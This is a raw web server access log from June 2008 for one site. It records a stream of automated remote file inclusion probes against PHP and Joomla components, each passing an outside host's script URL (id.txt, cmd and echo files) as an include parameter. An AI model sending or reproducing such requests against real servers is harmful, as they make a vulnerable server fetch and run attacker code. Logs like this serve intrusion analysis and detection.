190.34.160.226 - - [25/Jun/2008:09:00:33 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:09:00:57 -0700] "GET /page.php?s=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:01:00 -0700] "GET /logs/lib/gore.php?libpath=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:01:00 -0700] "GET /lib/gore.php?libpath=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:09:01:02 -0700] "GET /page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.213.237.34 - - [25/Jun/2008:09:01:05 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:01:24 -0700] "GET /logs/lib/gore.php?libpath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:01:24 -0700] "GET /lib/gore.php?libpath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:09:01:28 -0700] "GET /logs/access_071219.log//components/com_simpleboard/file_upload.php?sbp=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:09:01:29 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:09:01:29 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:01:44 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:09:02:03 -0700] "GET /logs/access_080118.log//components/com_simpleboard/file_upload.php?sbp=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:35 -0700] "GET /logs/access.log/index.php?url=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:36 -0700] "GET /logs/access.log/index.php?url=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:37 -0700] "GET /logs/access.log/index.php?url=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:37 -0700] "GET /index.php?url=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 200 18419 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:38 -0700] "GET /logs/index.php?url=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:38 -0700] "GET /index.php?url=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18415 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:39 -0700] "GET /logs/index.php?url=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:40 -0700] "GET /index.php?url=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 200 18421 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:09:02:40 -0700] "GET /logs/index.php?url=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:09:02:44 -0700] "GET /logs/access_071219.log//components/com_simpleboard/file_upload.php?sbp=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:09:02:45 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:09:02:45 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:03:13 -0700] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:09:03:25 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:09:03:26 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:03:47 -0700] "GET /logs/errors.php?error=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:03:47 -0700] "GET /errors.php?error=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:03:52 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:04:03 -0700] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.46.70.228 - - [25/Jun/2008:09:04:05 -0700] "GET /logs/access_080218.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:04:14 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:09:04:14 -0700] "GET /logs/access_080118.log//components/com_simpleboard/file_upload.php?sbp=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:04:24 -0700] "GET /logs/lib/gore.php?libpath=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:04:25 -0700] "GET /lib/gore.php?libpath=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:04:25 -0700] "GET /logs/errors.php?error=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:04:26 -0700] "GET /errors.php?error=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:09:04:34 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:09:04:36 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18421 "-" "libwww-perl/5.805" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:04:54 -0700] "GET /logs/lib/gore.php?libpath=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:04:55 -0700] "GET /lib/gore.php?libpath=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.111.194 - - [25/Jun/2008:09:05:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:06:30 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:06:46 -0700] "GET /logs/services.php?page=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:06:46 -0700] "GET /services.php?page=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:09:06:54 -0700] "GET /logs/services.php?page=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:09:06:54 -0700] "GET /services.php?page=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:07:18 -0700] "GET /logs/htmltonuke.php?filnavn=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:07:18 -0700] "GET /htmltonuke.php?filnavn=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:07:22 -0700] "GET /logs/services.php?page=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:07:23 -0700] "GET /services.php?page=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:07:27 -0700] "GET /logs/services.php?page=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:07:27 -0700] "GET /services.php?page=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:07:31 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:07:32 -0700] "GET /htmltonuke.php?filnavn=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:09:07:38 -0700] "GET /logs/htmltonuke.php?filnavn=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:09:07:38 -0700] "GET /htmltonuke.php?filnavn=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:09:07:48 -0700] "GET /logs/htmltonuke.php?filnavn=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:09:07:48 -0700] "GET /htmltonuke.php?filnavn=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:07:48 -0700] "GET /logs/services.php?page=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:07:48 -0700] "GET /services.php?page=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:07:53 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:07:54 -0700] "GET /htmltonuke.php?filnavn=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:09:07:59 -0700] "GET /logs/services.php?page=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:09:07:59 -0700] "GET /services.php?page=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:08:03 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:08:03 -0700] "GET /htmltonuke.php?filnavn=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:09:08:10 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:09:08:20 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:09:08:32 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:08:44 -0700] "GET /logs/index.php?body=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:08:47 -0700] "GET /index.php?body=http://208.46.111.12/images/images.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:09:14 -0700] "GET /logs/access_080507.log//language.inc.php?langs_dir=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:09:14 -0700] "GET /logs//language.inc.php?langs_dir=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:09:15 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:09:38 -0700] "GET /logs/access_080331.log//language.inc.php?langs_dir=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:09:56 -0700] "GET /logs/services.php?page=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:09:56 -0700] "GET /services.php?page=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:10:30 -0700] "GET /logs/services.php?page=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:10:31 -0700] "GET /services.php?page=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.24.222 - - [25/Jun/2008:09:10:38 -0700] "GET /logs/access_080106.log//components/com_joomlaboard/image_upload.php?sbp=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [25/Jun/2008:09:10:38 -0700] "GET //components/com_joomlaboard/image_upload.php?sbp=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [25/Jun/2008:09:10:39 -0700] "GET /logs//components/com_joomlaboard/image_upload.php?sbp=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:09:10:58 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:09:11:04 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18421 "-" "libwww-perl/5.805" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:11:40 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:11:40 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:11:43 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:11:43 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:11:47 -0700] "GET /logs/htmltonuke.php?filnavn=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:11:47 -0700] "GET /htmltonuke.php?filnavn=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:12:00 -0700] "GET /logs/access_080110.log//modules/TotalCalendar/about.php?inc_dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:12:03 -0700] "GET /logs/access_080110.log//modules/TotalCalendar/about.php?inc_dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.251.172 - - [25/Jun/2008:09:12:22 -0700] "GET //components/com_joomlaboard/image_upload.php?sbp=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:12:35 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:12:35 -0700] "GET //login.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:12:35 -0700] "GET /logs//login.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:09:12:39 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:09:12:39 -0700] "GET /classes/core/language.php?rootdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:09:12:39 -0700] "GET /logs/classes/core/language.php?rootdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:12:42 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:12:59 -0700] "GET /logs/lib/gore.php?libpath=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:12:59 -0700] "GET /lib/gore.php?libpath=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:09:13:06 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:09:13:06 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:13:07 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:13:07 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:13:07 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:13:08 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.245.7 - - [25/Jun/2008:09:13:30 -0700] "GET /logs/access_080327.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.245.7 - - [25/Jun/2008:09:13:34 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.245.7 - - [25/Jun/2008:09:13:35 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:13:40 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:13:41 -0700] "GET //login.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:13:41 -0700] "GET /logs//login.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.28.227 - - [25/Jun/2008:09:13:48 -0700] "GET /logs/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.88.28.227 - - [25/Jun/2008:09:13:48 -0700] "GET /image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:13:50 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.28.227 - - [25/Jun/2008:09:13:55 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.88.28.227 - - [25/Jun/2008:09:13:55 -0700] "GET /logs/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.88.28.227 - - [25/Jun/2008:09:13:55 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.88.28.227 - - [25/Jun/2008:09:13:55 -0700] "GET /image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.88.28.227 - - [25/Jun/2008:09:14:04 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.88.28.227 - - [25/Jun/2008:09:14:04 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
